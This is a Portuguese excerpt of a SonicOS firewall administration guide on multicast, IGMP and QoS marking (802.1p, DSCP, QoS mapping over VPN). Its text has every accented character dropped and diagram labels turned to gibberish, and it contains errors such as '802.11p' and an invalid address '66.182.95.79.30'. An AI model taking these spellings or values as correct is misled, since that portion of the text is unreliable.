Voc suspeita que consultas ou relatrios de associao esto sendo perdidos na
rede.
Voc deseja reduzir o trfego IGMP na rede e tem atualmente um grande nmero de
clientes ou grupos de difuso seletiva. Esta uma condio em que voc no tem um
roteador para rotear o trfego.
Voc deseja sincronizar o tempo com um roteador IGMP.
Polticas de difuso seletiva

Esta seo fornece as tarefas de configurao de Polticas de difuso seletiva.

Habilitar recepo de todos os endereos de difuso seletiva este boto de opo
no est habilitado por padro. Selecione este boto de opo para receber todos os
endereos de difuso seletiva (classe D). A recepo de todos os endereos de difuso
seletiva poder resultar em uma degradao do desempenho de sua rede.
Habilitar recepo dos seguintes endereos de difuso seletiva este boto de opo
est habilitado por padro. No menu suspenso, selecione Criar um novo objeto de
difuso seletiva ou Criar novo grupo de difuso seletiva.
Nota Somente os objetos e grupos de endereos associados zona de DIFUSO SELETIVA

esto disponveis para seleo. Somente os endereos de 224.0.0.1 a 239.255.255.255
podem ser vinculados zona de DIFUSO SELETIVA.
Para criar um objeto de endereo de difuso seletiva, execute as seguintes etapas:
Etapa 1 Na lista Habilitar recepo dos seguintes endereos de difuso seletiva, selecione Criar
novo objeto de difuso seletiva.
Etapa 2 Na janela Adicionar objeto de endereo, configure:
Nome: O nome do objeto de endereo.
Atribuio de zonas: Selecione DIFUSO SELETIVA.
Tipo: Selecione Host, Intervalo, Rede ou MAC.
Endereo IP: Se voc selecionou Host ou Rede, o endereo IP do host ou da rede. O
endereo IP deve estar no intervalo de difuso seletiva: 224.0.0.0 a 239.255.255.255.
Mscara de rede: Se voc tiver selecionado Rede, a mscara de rede para a rede.
Endereo IP de incio e Endereo IP de trmino: Se voc selecionou Intervalo, os
endereos IP de incio e de trmino do intervalo de endereos. Os endereos IP devem
estar no intervalo de difuso seletiva: 224.0.0.1 a 239.255.255.255.
Tabela de estados IGMP

Esta seo fornece as descries dos campos na Tabela de estados IGMP.
Endereo de grupo de difuso seletiva fornece ao endereo de grupo de difuso
seletiva a interface em que est ingressado.
Interface/tnel VPN fornece a interface (como LAN) da poltica de VPN.
Verso de IGMP fornece a verso IGMP (como V2 ou V3).
Botes Liberar e Liberar tudo para liberar imediatamente uma entrada especfica,
marque a caixa esquerda da entrada e clique em Liberar. Clique em Liberar tudo para
liberar imediatamente todas as entradas.
Habilitar difuso seletiva em interfaces dedicadas de LAN

Para habilitar o suporte a difuso seletiva nas interfaces dedicadas de LAN do seu firewall:

Etapa 1 Navegue at a pgina Configuraes de firewall > Difuso seletiva.
Etapa 2 Em Rastreamento de difuso seletiva, selecione Habilitar difuso seletiva.
Etapa 3 Em Poltica de difuso seletiva, selecione Habilitar recepo de todos os endereos de
difuso seletiva.
Etapa 5 Clique no boto Configurar da interface de LAN que voc deseja configurar.
Etapa 6 Na caixa de dilogo Editar interface, na guia Avanado, selecione Habilitar suporte a
difuso seletiva.
Para habilitar o suporte a difuso seletiva para objetos de endereo em um tnel VPN:
Etapa 1 Navegue at a pgina Configuraes de firewall > Difuso seletiva.

Etapa 2 Em Rastreamento de difuso seletiva, selecione Habilitar difuso seletiva.
Etapa 3 Em Poltica de difuso seletiva, selecione Habilitar recepo dos seguintes endereos de
difuso seletiva.
Etapa 4 No menu suspenso, selecione Criar novo objeto de endereo de difuso seletiva...
A caixa de dilogo Adicionar objeto de endereo ser exibida.
Etapa 5 Na caixa Nome, digite um nome para o seu objeto de endereo de difuso seletiva.
Etapa 6 No menu Atribuio de zona, selecione uma zona: LAN, WAN, DMZ, VPN, SSLVPN, MGMT,
DIFUSO SELETIVA ou WLAN.
Etapa 7 No menu Tipo, selecione Host, Intervalo, Rede, MAC ou FQDN.
Se voc selecionar Host, na caixa Endereo IP digite um Endereo IP.
Se voc selecionar Intervalo, digite o Endereo IP de incio e o Endereo IP de
trmino.
Se voc selecionar Rede, digite o endereo IP da Rede e uma Mscara de rede.
Se voc selecionar MAC, digite o Endereo MAC.
Etapa 8 Navegue at a pgina VPN > Configuraes.
Etapa 9 Em Polticas de VPN, clique no boto Configurar da poltica de VPN de grupo que voc
deseja configurar.
Etapa 10 Na caixa de dilogo Poltica de VPN, na guia Avanado, selecione Habilitar difuso seletiva.

Habilitar difuso seletiva atravs de uma VPN
Para habilitar a difuso seletiva na WAN atravs de uma VPN, execute o seguinte:
Etapa 1 Habilite a difuso seletiva globalmente. Na pgina Configuraes de firewall > Difuso
seletiva, marque a caixa de seleo Habilitar difuso seletiva e clique no boto Aplicar para
cada dispositivo de segurana.
Etapa 2 Habilite o suporte a difuso seletiva em cada interface individual que ir participar na rede de
difuso seletiva. Na pgina Rede > Interfaces de cada interface em todos os dispositivos de
segurana participando, v para a guia Editar interface: Avanado e marque a caixa de
seleo Habilitar suporte a difuso seletiva.
Etapa 3 Habilite a difuso seletiva nas polticas de VPN entre os dispositivos de segurana. Na pgina
VPN > Configuraes, guia Avanado de cada poltica, marque a caixa de seleo Habilitar
difuso seletiva.
Nota Observe que a regra de acesso DIFUSO SELETIVA da WLAN padro para trfego IGMP
est definida como "NEGAR". Isso precisa ser alterado para "PERMITIR" em todos os
dispositivos participantes para habilitar a difuso seletiva se eles tiverem clientes de difuso
seletiva em suas zonas de WLAN.
Etapa 4 Verifique se os tneis esto ativos entre os sites e inicie o aplicativo de servidor de difuso
seletiva e os aplicativos de cliente. Como os dados de difuso seletiva so enviados do
servidor de difuso seletiva para o grupo de difuso seletiva (224.0.0.0 a 239.255.255.255), o
firewall ir consultar sua tabela de estados IGMP desse grupo para determinar onde entregar
esses dados. Da mesma forma, quando o dispositivo recebe esses dados na zona de VPN, ele
ir consultar sua tabela de estados IGMP para determinar onde ele deve entregar os dados.
As tabelas de estados IGMP (no momento da atualizao) devem fornecer informaes
para indicar se existe um cliente de difuso seletiva na interface X3 e no tnel
vpnMcastServer do grupo 224.15.16.17.

Nota Ao selecionar "Habilitar recepo de todos os endereos de difuso seletiva", voc poder
ver entradas diferentes daquelas que est esperando ao visualizar sua tabela de estados
IGMP. Estes so causados por outros aplicativos de difuso seletiva que podem estar em
execuo em seus hosts.

Captulo 47
Gerenciar a Qualidade de Servio
Configuraes de firewall > Mapeamento QoS

A Qualidade de Servio (QoS) refere-se a uma diversidade de mtodos com o objetivo de
fornecer o desempenho e o comportamento de rede previsveis. Esse tipo de previso
essencial para determinados tipos de aplicativos, como Voz sobre IP (VoIP), contedo de
multimdia, ou para aplicativos essenciais para negcios, como processamento de
encomendas ou cartes de crdito. Nenhuma quantidade de largura de banda pode fornecer
esse tipo de previso, porque qualquer quantidade de largura de banda ser, por fim, usada
sua capacidade em algum momento em uma rede. Somente a QoS, quando configurada e
implementada corretamente, pode gerenciar adequadamente o trfego e garantir os nveis de
servio de rede desejados.
Classificao na pgina 725
Marcao na pgina 726
Condicionamento na pgina 727
Classificao
A classificao necessria como uma primeira etapa para que o trfego que precisa de
gerenciamento possa ser identificado. O SonicOS usa regras de acesso como a interface para
classificao de trfego. Isso fornece controles detalhados usando combinaes de elementos
de Objeto de endereo, Objeto de servio e Objeto de programao, permitindo critrios de
classificao to gerais quanto todo o trfego HTTP e to especficos quanto o trfego SSH
de host A para servidor B s quartas-feiras s 2h12.
Os dispositivos de segurana de rede Dell SonicWALL tm a capacidade de reconhecer,
mapear, modificar e gerar designadores CoS externos padro da indstria, DSCP e 802.1p
(consulte a seo QoS 802.1p e DSCP na pgina 728).
Uma vez identificada ou classificada, ela pode ser gerenciada. O gerenciamento pode ser
executado internamente atravs do Gerenciamento de largura de banda (BWM) do SonicOS,
o qual perfeitamente eficaz, desde que a rede seja um sistema autnomo totalmente contido.
Uma vez introduzidos os elementos externos ou intermedirios, como infraestruturas de rede
externas com configuraes desconhecidas ou outros hosts que competem por largura de
banda (por exemplo, a Internet), a capacidade de oferecer garantias e a previsibilidade so
Gerenciar a Qualidade de Servio | 725

reduzidas. Por outras palavras, desde que os pontos terminais da rede e tudo o que se
encontra entre eles estejam dentro de seu gerenciamento, o BWM funcionar exatamente
como configurado. Uma vez introduzidas as entidades externas, a preciso e a eficcia das
configuraes de BWM podem comear a degradar-se.
Mas nem tudo est perdido. Assim que o SonicOS classificar o trfego, ele pode marc-lo para
comunicar essa classificao a determinados sistemas externos que so capazes de aceitar
marcas CoS; assim, eles tambm podem participar fornecendo QoS.
Nota Muitos provedores de servios no oferecem suporte a marcas CoS como 802.1p ou DSCP.
Alm disso, a maioria dos equipamentos de rede com configuraes padro no ser capaz
de reconhecer marcas 802.1p e poder descartar o trfego marcado.
Embora o DSCP no cause problemas de compatibilidade, muitos provedores de servio
simplesmente descartaro ou ignoraro as marcas DSCP, desconsiderando os pontos de
cdigo.
Se voc desejar usar a marcao 802.1p ou DSCP na sua rede ou na rede do seu
provedor de servios, voc deve primeiro determinar se esses mtodos so
suportados. Verifique se o seu equipamento de rede interna pode suportar a
marcao de prioridade CoS e se est corretamente configurado para tal. Verifique
com seu provedor de servios alguns oferecem suporte pago para QoS usando
esses mtodos CoS.
Marcao
Depois que o trfego seja classificado, se se destinar a ser tratado por sistemas externos que
suportam QoS (por exemplo, switches ou roteadores com reconhecimento de CoS, como
podero estar disponveis em uma infraestrutura de provedor de servios premium ou em uma
WAN privada), ele deve ser marcado para que os sistemas externos possam usar a
classificao e fornecer o tratamento correto e Comportamentos por salto (PHB).
Originalmente, isso foi tentado na camada IP (camada 3) com trs bits de precedncia de
RFC791 e campo ToS (tipo de servio) de RFC1394, mas isso foi usado por um total geral de
17 pessoas ao longo dos tempos. Seu sucessor, RFC2474, introduziu o muito mais prtico e
amplamente usado DSCP (Ponto de cdigo de servios diferenciados) que oferecia at 64
classificaes, bem como classes definveis pelo usurio. O DSCP foi melhorado por RFC2598
(Encaminhamento rpido, destinado a fornecer comportamentos de linha dedicada) e
RFC2697 (nveis de Encaminhando assegurado em classes, tambm conhecidos como nveis
de Ouro, Prata e Bronze).
DSCP um mtodo de marcao seguro para o trfego que atravessa redes pblicas porque
no h nenhum risco de incompatibilidade. Na pior das hipteses, um salto ao longo do
caminho pode desconsiderar ou descartar a marca DSCP, mas ele raramente tratar
incorretamente ou descartar o pacote.
O outro mtodo predominante de marcao CoS IEEE 802.1p. 802.1p ocorre na camada
MAC (camada 2) e est relacionado com a marcao IEEE 802.1Q VLAN, compartilhando o
mesmo campo de 16 bits, embora, na verdade, esteja definido no IEEE 802.1D padro. Ao
contrrio do DSCP, o 802.1p funcionar somente com equipamento que suporta 802.1p e no
universalmente interopervel. Alm disso, o 802.1p, devido sua estrutura de pacotes
diferente, raramente consegue atravessar redes de longa distncia, at mesmo WANs
privadas. No entanto, o 802.1p est ganhando suporte amplo entre fornecedores de Voz e
Vdeo sobre IP, para que uma soluo de suporte de 802.1p em limites de rede (ou seja, links
de WAN) seja introduzida na forma de mapeamento 802.1p para DSCP.

O mapeamento 802.1p para DSCP permite que marcas 802.1p de uma LAN sejam mapeadas
para os valores DSCP pelo SonicOS, permitindo que os pacotes percorram links de WAN com
segurana. Quando os pacotes chegam do outro lado da WAN ou VPN, o dispositivo SonicOS
de recebimento pode mapear as marcas DSCP de volta para marcas 802.1p para uso nessa
LAN. Para obter mais informaes, consulte QoS 802.1p e DSCP na pgina 728.
Condicionamento
O trfego pode ser condicionado (ou gerenciado) usando qualquer um dos mtodos
disponveis de polticas, enfileiramento e formatao. O SonicOS fornece recursos de
condicionamento interno com o seu Gerenciamento de largura de banda (BWM) de egresso e
ingresso, detalhado em Gerenciamento de largura de banda na pgina 739. O BWM do
SonicOS uma soluo perfeitamente eficiente para redes privadas totalmente autnomas
com largura de banda suficiente, mas pode se tornar um pouco menos eficaz medida que
so introduzidos mais elementos de rede externa desconhecidos e conteno de largura de
banda. Consulte o Cenrio de exemplo na pgina 731 no Cenrio de exemplo na pgina 731
para obter uma descrio dos problemas de conteno.
VPN site a site atravs de redes que suportam QoS

Se o caminho de rede entre os dois pontos terminais reconhecer QoS, o SonicOS pode marcar
com DSCP o pacote encapsulado interno para que seja interpretado corretamente no outro
lado do tnel e pode tambm marcar com DSCP o pacote encapsulado de ESP externo para
que a sua classe possa ser interpretada e respeitada por cada salto ao longo da rede de
trnsito. O SonicOS pode mapear marcas 802.1p criadas em redes internas para marcas
DSCP para que elas possam atravessar com segurana a rede de trnsito. Em seguida,
quando os pacotes so recebidos do outro lado, o dispositivo SonicWALL de recebimento pode
converter as marcas DSCP de volta para as marcas 802.1p para interpretao e aceitao por
essa rede interna.
VPN site a site atravs de redes pblicas

O BWM integrado do SonicOS muito eficaz no gerenciamento de trfego entre redes VPN
conectadas, pois o trfego de ingresso e egresso pode ser classificado e controlado nos dois
pontos terminais. Se a rede entre os pontos terminais no reconhecer QoS, ela considera e

trata todas as ESP de VPN de forma igual. Como geralmente no existe nenhum controle
relativamente a essas redes intermedirias ou respectivos caminhos, difcil garantir
totalmente QoS, mas o BWM ainda pode ajudar a fornecer um comportamento mais previsvel.
Internet
Network Security Appliance E7500 Network Security Appliance E7500
SonicWALL NSA SonicWALL NSA
VoIP Phone VoIP Phone Web Server VoIP Server

PC 1 192.168.168.200 10.50.166.200 10.50.165.3 10.50.167.100
192.168.168.100 DSCP/802.11p capable DSCP/802.11p capable
Remote LAN Main Site LAN
VoIP Traffic
LAN -> VPN DSCP: 48 802.11p: 6 Inbound Gar. 30% Max: 60% Pri: 0
VoIP Traffic LAN -> VPN DSCP: 48 802.11p: 6 Outbound Gar. 30% Max: 60% Pri: 0
VPN -> LAN DSCP: 48 802.11p: 6 Inbound Gar. 30% Max: 60% Pri: 0
VPN -> LAN DSCP: 48 802.11p: 6 Outbound Gar. 30% Max: 60% Pri: 0
Web Traffic (HTTP, HTTPS, NNTP, TCP4662

LAN -> VPN DSCP: 8 802.11p: 1 Inbound Gar. 5% Max: 30% Pri: 2
Web Traffic LAN -> VPN DSCP: 8 802.11p: 1 Outbound Gar. 5% Max: 30% Pri: 2
LAN -> WAN DSCP: 0 802.11p: - Inbound Gar. 2% Max: 30% Pri: 7
LAN -> WAN DSCP: 0 802.11p: - Outbound Gar. 2% Max: 10% Pri: 7
Para fornecer QoS de ponta a ponta, os provedores de servios de classe executiva esto
oferecendo cada vez mais servios condicionantes de trfego em suas redes IP. Esses
servios normalmente dependem do equipamento que se encontra nas instalaes do cliente
para classificar e marcar o trfego, geralmente usando um mtodo de marcao padro como
DSCP. O SonicOS tem a capacidade de marcar trfego com DSCP aps a classificao, bem
como a capacidade de mapear marcas 802.1p em marcas DSCP para passagem da rede
externa e preservao de CoS. Para trfego VPN, o SonicOS pode marcar com DSCP no
apenas os pacotes internos (carga), mas tambm os pacotes externos (encapsulamento) para
que os provedores de servios que suportam QoS possam oferecer QoS mesmo em trfego
VPN criptografado.
O mtodo de condicionamento real usado por provedores de servios varia de um para o outro,
mas geralmente envolve um mtodo de enfileiramento com base na classe, como
enfileiramento razovel ponderado para priorizar o trfego e um mtodo de impedimento de
congestionamento, como "tail-drop" ou Deteco antecipada aleatria.
QoS 802.1p e DSCP

As sees a seguir detalham a QoS 802.1p padro e DSCP.

Habilitar 802.1p
O SonicOS suporta mtodos de CoS de camada 2 e camada 3 para uma ampla
interoperabilidade com sistemas externos participando de ambientes habilitados por QoS. O
mtodo de camada 2 o padro IEEE 802.1p no qual podem ser usados 3 bits de 16 bits
adicionais inseridos no cabealho do quadro de Ethernet para designar a prioridade do quadro,
como ilustrado na figura a seguir:
.
Ethernet Data Frame
Bytes 7 1 6 6 2 2 2 46-1500 4
SFD
preamble DA SA VPID TCI Len LLC Data FCS
Bits 16 3 1 12
Protocol ID
CFI
802.11q VLAN Tag (x8100 for 802.1q tags) 802.1p VLAN ID
TPID: O identificador de protocolo de marca inicia no byte 12 (aps os campos de origem

e destino de 6 bytes), tem 2 bytes de comprimento e tem um tipo ether de 0x8100 para
trfego marcado.
802.1p: Os primeiros trs bits de TCI (Informaes de controle de marca com incio no
byte 14 e uma abrangncia de 2 bytes) definem a prioridade do usurio, fornecendo oito
(2^3) nveis de prioridade. IEEE 802.1p define a operao para esses 3 bits de prioridade
de usurio.
CFI: Indicador de formato cannico um sinalizador de bit nico, sempre definido como
zero para switches de Ethernet. O CFI usado por motivos de compatibilidade entre redes
Ethernet e redes Token Ring. Se um quadro recebido em uma porta Ethernet tiver um CFI
definido como 1, ento esse quadro no dever ser encaminhado tal como est para uma
porta no marcada.
ID de VLAN: O ID de VLAN (inicia no bit 5 de 14 bits) a identificao da VLAN. Ele tem
12 bits e permite a identificao de 4096 (2^12) IDs de VLAN exclusivos. Dos 4096 IDs
possveis, um ID de 0 usado para identificar quadros de prioridade e um ID de 4095 (FFF)
reservado para que as configuraes de VLAN mximas possveis sejam de 4094.
O suporte de 802.1p comea, habilitando a marcao 802.1p nas interfaces que voc desejar
que tenham marcas 802.1p de processo. O 802.1p pode ser habilitado em qualquer interface
Ethernet, em qualquer dispositivo SonicWALL.
O comportamento do campo 802.1p dentro dessas marcas pode ser controlado por Regras de
acesso. A ao de regra de acesso de 802.1p padro de Nenhum redefinir marcas 802.1p
existentes para 0, a menos que o contrrio seja configurado (consulte Gerenciar a Marcao
QoS na pgina 736 para obter detalhes).
Habilitar a marcao 802.1p permitir que a interface de destino reconhea marcas 802.1p de
entrada geradas por dispositivos de rede que suportam 802.1p e tambm permitir que a
interface de destino crie marcas 802.1p, conforme controlado pelas Regras de acesso.
Quadros que possuem marcas 802.1p inseridas pelo SonicOS tero o ID 0 de VLAN.
As marcas 802.1p somente sero inseridas de acordo com Regras de acesso para que a
habilitao da marcao 802.1p em uma interface, em sua configurao padro, no perturbe
as comunicaes com dispositivos que no suportam 802.1p.

802.1p requer suporte especfico pelos dispositivos em rede com os quais voc deseja usar
esse mtodo de priorizao. Muitos dispositivos de voz e vdeo sobre IP oferecem suporte para
802.1p, mas o recurso deve ser habilitado. Se voc no tiver certeza, verifique a
documentao do seu equipamento para obter informaes sobre suporte 802.1p. Da mesma
forma, muitas placas de rede de servidor e host (NICs) tm a capacidade para suportar 802.1p,
mas o recurso geralmente est desabilitado por padro. Em sistemas operacionais Win32,
voc pode verificar e definir configuraes de 802.1p na guia Avanado da pgina
Propriedades de sua placa de rede. Se sua placa suportar 802.1p, ser listado como QoS
802.1p, Suporte 802.1p, Marcao de pacotes QoS ou algo semelhante:
Para processar marcas 802.1p, o recurso deve estar presente e habilitado na interface de rede.
A interface de rede ser ento capaz de gerar pacotes com marcas 802.1p, como controlado
pelos aplicativos compatveis com QoS. Por padro, comunicaes de rede geral no tero
marcas inseridas para manter a compatibilidade com dispositivos que no suportam 802.1p.
Nota Se sua interface de rede no suporta 802.1p, ela no ser capaz de processar o trfego
marcado com 802.1p e ir ignor-lo. Ao definir Regras de acesso para habilitar a marcao
802.1p, certifique-se de que os dispositivos de destino suportem 802.1p.
Observe tambm que, ao executar uma captura de pacotes (por exemplo, com a ferramenta
de diagnstico Ethereal) em dispositivos que suportam 802.1p, alguns deles no mostraro
o cabealho 802.1q na captura de pacotes. Por outro lado, uma captura de pacotes
executada em um dispositivo que no suporte 802.1p mostrar quase invariavelmente o
cabealho, mas o host no conseguir processar o pacote.
Antes de avanar para Gerenciar a Marcao QoS na pgina 736, importante introduzir
"Marcao DSCP" devido a potencial interdependncia entre os dois mtodos de marcao,
bem como para explicar por que existe a interdependncia.

Cenrio de exemplo
Internet
.ETWORK3ECURITY!PPLIANCE .ETWORK3ECURITY!PPLIANCE %

%
NSA Appliance NSA Appliance

nc VoIP Server
2
10.20.30.100
Switch
S h Core Switch
1
File Server - 1 File Server - 2
192.168.168.100 10.50.165.100
Workgroup Workgroup
Switch 3 Switch
VoIP Phone VoIP Phone

PC - 1 192.168.168.200 10.50.165.200
PC - 2
192.168.168.10 802.1p/ DSCP 802.1p/ DSCP
10.50.165.200
capable capable
802.1p/DSCP
capable
KEY Remote Site 1 Remote Site 2

Blue Lines: 100Mbit links X0 (LAN): 192.168.168.168/24 X0 (LAN): 10.50.165.1/24
Green Lines: 1000Mbit links X1 (WAN): 66.182.95.79.30 X1 (WAN): 67.115.118.80/24
Red Lines: VPN Tunnel X2 (DMZ): 10.20.30.1/24
Orange Line: Line speed data transfer VPN Policy 1: ToHQ
Plum Line: Voice Media Local Net: 192.168.168.0/24 VPN Policy 1: ToRemoteSite1
Remote Net: 10.50.165.0/24 Local Net: 10.50.165.0/24
Remote Net: 10.20.30.0/24 Local Net: 10.20.30.x/24
Remote Net: 192.168.168.0/24
Na situao acima, temos Site remoto 1 conectado a "Site principal" por uma VPN IPsec. A
empresa usa um sistema de telefone VoIP interno que suporta 802.1p/DSCP com um servidor
de sinalizao VoIP privado hospedado no site principal. O site principal tem uma infraestrutura
de Fast Ethernet e gigabit misto, enquanto o site remoto 1 tem apenas Fast Ethernet. Os dois
sites usam switches que suportam 802.1p para priorizao de trfego interno.
1. O PC-1 no Site remoto 1 est a transferir uma apresentao PowerPoint de 23 terabytes
para o Servidor de arquivos 1 e o link de 100 mbit entre o switch de grupo de trabalho e o
switch upstream est completamente cheio.
2. No Site principal, um chamador no telefone VoIP que suporta 802.1p/DSCP 10.50.165.200
iniciou uma chamada para a pessoa do telefone VoIP 192.168.168.200. O 802.1p do
telefone VoIP que efetua a chamada marca o trfego com a marca de prioridade 6 (voz) e
o DSCP marca o trfego com uma marca de 48.
a. Se o link entre o switch de ncleo e o firewall for uma VLAN, alguns switches incluiro
a marca de prioridade 802.1p recebida, alm da marca DSCP, no pacote enviado para
o firewall. Esse comportamento varia de switch para switch e muitas vezes
configurvel.
b. Se o link entre o switch de ncleo e o firewall no for uma VLAN, no possvel para
o switch incluir a marca de prioridade 802.1p. A prioridade 802.1p removida e o
pacote (incluindo apenas a marca DSCP) encaminhado para o firewall.

Quando o firewall envia o pacote atravs do link VPN/WAN, ele poder incluir a marca
DSCP no pacote, mas no possvel incluir a marca 802.1p. Isso poder causar a perda
de todas as informaes de priorizao do trfego de VoIP, porque quando o pacote chegar
no site remoto, o switch no ter quaisquer informaes de camada MAC 802.1p para
priorizar o trfego. O switch de site remoto trata o trfego de VoIP do mesmo modo que a
transferncia de arquivos de prioridade menor devido saturao do link, introduzindo
retardo, e talvez at mesmo pacotes descartados, no fluxo de VoIP, resultando em
degradao da qualidade da chamada.
Desta forma, como podem persistir informaes prioritrias essenciais de 802.1p da LAN
do Site principal atravs do link VPN/WAN para a LAN de Site remoto? Atravs do uso de
Mapeamento QoS.
O Mapeamento QoS um recurso que converte marcas 802.1p de camada 2 para marcas
DSCP de camada 3 para que elas possam transmitir com segurana (na forma mapeada)
links que no suportam 802.1p. Quando o pacote chega para entrega ao prximo
segmento compatvel com 802.1p, o Mapeamento QoS converte de DSCP de volta para
marcas 802.1p para que a QoS de camada 2 possa ser respeitada.
Em nosso cenrio acima, o firewall no Site principal atribui uma marca DSCP (por exemplo,
valor 48) aos pacotes VoIP, bem como aos pacotes ESP encapsulados, permitindo que a
QoS de camada 3 seja aplicada na WAN. Esta atribuio pode ocorrer atravs da
preservao da marca DSCP existente ou mapeando o valor de uma marca 802.1p, se
estiver presente. Quando os pacotes VoIP chegam ao outro lado do link, o processo de
mapeamento revertido pelo SonicWALL de recebimento, mapeando a marca DSCP de
volta para uma marca 802.1p.
3. O SonicWALL de recebimento no Site remoto est configurado para mapear o intervalo de
marcas DSCP 4855 para a marca 6 802.1p. Quando o pacote encerrado do firewall, ele
assumir a marca 6 802.1p. O Switch reconhecer a marca como trfego de voz e ir
prioriz-la atravs de transferncia de arquivos, garantindo QoS mesmo no caso de
saturao de link.

Marcao DSCP
A marcao DSCP (Ponto de cdigo de servios diferenciados) usa 6 bits de 8 bits do campo
ToS no cabealho IP para fornecer at 64 classes (ou pontos de cdigo) para trfego. Como o
DSCP um mtodo de marcao de camada 3, no existe nenhuma preocupao com a
compatibilidade, contrariamente marcao 802.1p. Os dispositivos que no suportam DSCP
simplesmente ignoraro as marcas ou, na pior das hipteses, redefiniro o valor de marca
como 0.
IP Packet
Bits 4 4 8 16 16
Version HLength TOS Total Length ID
Bits 3 1 1 1 1 1
Precendence Delay Throughput Reliability Cost MBZ
Bits 6 2
Differentiated Services Code Point Unused
O diagrama acima mostra um pacote IP, com uma incidncia na parte de ToS do cabealho.
Os bits de ToS eram originalmente usados para configuraes de Precedncia e ToS (atraso,
velocidade de processamento, confiabilidade e custo), mas foram mais tarde redefinidos por
RFC2474 para as configuraes de DSCP mais versteis.
A tabela a seguir mostra os pontos de cdigo comumente usados, bem como seu mapeamento
para as configuraes de Precedncia e ToS herdadas.
DSCP Descrio de DSCP Precedncia de IP herdada ToS de IP herdado (D, T, R)

0 Melhor esforo 0 (Rotina 000) -
8 Classe 1 1 (Prioridade 001) -
10 Classe 1, ouro (AF11) 1 (Prioridade 001) T
12 Classe 1, prata (AF12) 1 (Prioridade 001) D
14 Classe 1, bronze (AF13) 1 (Prioridade 001) D, T
16 Classe 2 2 (Imediato 010) -
18 Classe 2, ouro (AF21) 2 (Imediato 010) T
20 Classe 2, prata (AF22) 2 (Imediato 010) D
22 Classe 2, bronze (AF23) 2 (Imediato 010) D, T
24 Classe 3 3 (Flash 011) -
26 Classe 3, ouro (AF31) 3 (Flash 011) T
27 Classe 3, prata (AF32) 3 (Flash 011) D

DSCP Descrio de DSCP Precedncia de IP herdada ToS de IP herdado (D, T, R)
30 Classe 3, bronze (AF33) 3 (Flash 011) D, T
32 Classe 4 4 (Substituio de flash 100) -
34 Classe 4, ouro (AF41) 4 (Substituio de flash 100) T
36 Classe 4, prata (AF42) 4 (Substituio de flash 100) D
38 Classe 4, bronze (AF43) 4 (Substituio de flash 100) D, T
40 Encaminhamento expresso 5 (CRTICO/ECP 101) -
46 Encaminhamento rpido 5 (CRTICO/ECP 101) D, T
(EF)
48 Controle 6 (Controle de Internet 110) -
56 Controle 7 (Controle de rede 111) -
A marcao DSCP pode ser executada no trfego para/de qualquer interface e para/de
qualquer tipo de zona, sem exceo. A marcao DSCP controlada por Regras de acesso,
a partir da guia QoS, e pode ser usada em conjunto com a marcao 802.1p, bem como com
o gerenciamento de largura de banda interna do SonicOS.
Marcao DSCP e trfego VPN misto

Entre suas diversas caractersticas e medidas de segurana, as VPNs IPsec empregam
mecanismos de antirretransmisso com base em nmeros de sequncia incrementados de
forma monotnica, adicionados ao cabealho ESP. Os pacotes com nmeros de sequncia
duplicados so descartados, tal como acontece com os pacotes que no so compatveis com
os critrios de sequncia. Um critrio desse tipo rege o processamento de pacotes com
defeito. O SonicOS fornece uma janela de retransmisso de 64 pacotes, por exemplo, se um
pacote ESP de uma Associao de Segurana (SA) estiver atrasado por mais de 64 pacotes,
o pacote ser descartado.
Isso deve ser considerado ao usar marcao DSCP para fornecer QoS de camada 3 ao trfego
que passa por uma VPN. Se voc tiver um tnel VPN que transporta uma diversidade de
trfego, algum desse trfego sendo marcado com DSCP de alta prioridade (por exemplo, VoIP)
e outro trfego sendo marcado com DSCP de baixa prioridade ou no marcado/melhor esforo
(por exemplo, FTP), seu provedor de servios priorizar o processamento e a entrega dos
pacotes ESP de alta prioridade em detrimento dos pacotes ESP de melhor esforo. Em
determinadas condies de trfego, isso pode resultar em pacotes de melhor esforo sendo
atrasados por mais de 64 pacotes, fazendo com que eles sejam descartados por defesas de
antirretransmisso do SonicWALL de recebimento.
Se surgirem sintomas de tal cenrio (por exemplo, retransmisses excessivas de trfego de
baixa prioridade), recomendvel que voc crie uma poltica de VPN separada para as classes
de trfego de alta prioridade e baixa prioridade. Isso mais facilmente realizado colocando os
hosts de alta prioridade (por exemplo, a rede de VoIP) na sua prpria sub-rede.
Configurar CoS 4 de 802.1p Carga controlada

Se voc deseja alterar o mapeamento de entrada da marca DSCP 15 de seu mapeamento
802.1p padro de 1 para um mapeamento 802.1p de 2, tal precisa ser feito em duas etapas,
porque os intervalos de mapeamento no podem se sobrepor. A tentativa de atribuir um
mapeamento sobreposto causar o erro O intervalo DSCP j existe ou se sobrepe a outro
intervalo. Primeiro, voc ter de remover 15 de seu atual mapeamento de intervalo final para
802.1p CoS 1 (alterando o mapeamento de intervalo final de 802.1p CoS 1 para DSCP 14) e,
em seguida, voc pode atribuir DSCP 15 ao mapeamento de intervalo inicial em 802.1p CoS 2.

Mapeamento QoS
O objetivo principal do Mapeamento QoS permitir que marcas 802.1p persistam em links no
compatveis com 802.1p (por exemplo, links de WAN), mapeando-as para as marcas DSCP
correspondentes antes do envio atravs do link de WAN e, em seguida, mapeando de DSCP
de volta para 802.1p na chegada ao outro lado:
PTAG
$3#0TAG
PTAG
6O)0 6O)0
Wide Area Network
0HONE .ETWORK3ECURITY!PPLIANCE % .ETWORK3ECURITY!PPLIANCE %
0HONE
-APPTO$3#0 -APPTO$3#0

802.1 802.1
-AP$3#0TOP -AP$3#0TOP
2EQUEST$3#0TAG
2EQUEST.O$3#0TAG 2ESPONSE.O$3#0TAG
2ESPONSE$3#0TAG
Wide Area Network

.ETWORK3ECURITY!PPLIANCE .ETWORK3ECURITY!PPLIANCE %
%
:ONE,!. 60. .O1O3-ARKINGCONFIGURED

3OURCE
$ESTINATION
3ERVICE(440
$3#0TAG
./$3#0TAG
Nota O mapeamento no ocorrer at que voc defina Mapear como uma ao da guia QoS de
uma Regra de acesso. A tabela de mapeamento define somente a correspondncia que
ser utilizada pela ao Mapear de uma Regra de acesso.
Por exemplo, de acordo com a tabela padro, uma marca 802.1p com um valor de 2 ser
mapeada na sada para um valor DSCP de 16, enquanto uma marca DSCP de 43 ser
mapeada na entrada para um valor 802.1 de 5.
Cada um desses mapeamentos pode ser reconfigurado. Se voc desejar alterar o
mapeamento de sada da marca 802.1p 4 do seu valor DSCP padro de 32 para um valor
DSCP de 43, voc pode clicar no cone Configurar para 4 Carga controlada e selecionar o
novo valor Em DSCP na caixa suspensa:
Remapeamento de intervalo final 802.1p CoS 1 Remapeamento de intervalo inicial 802.1p CoS 2
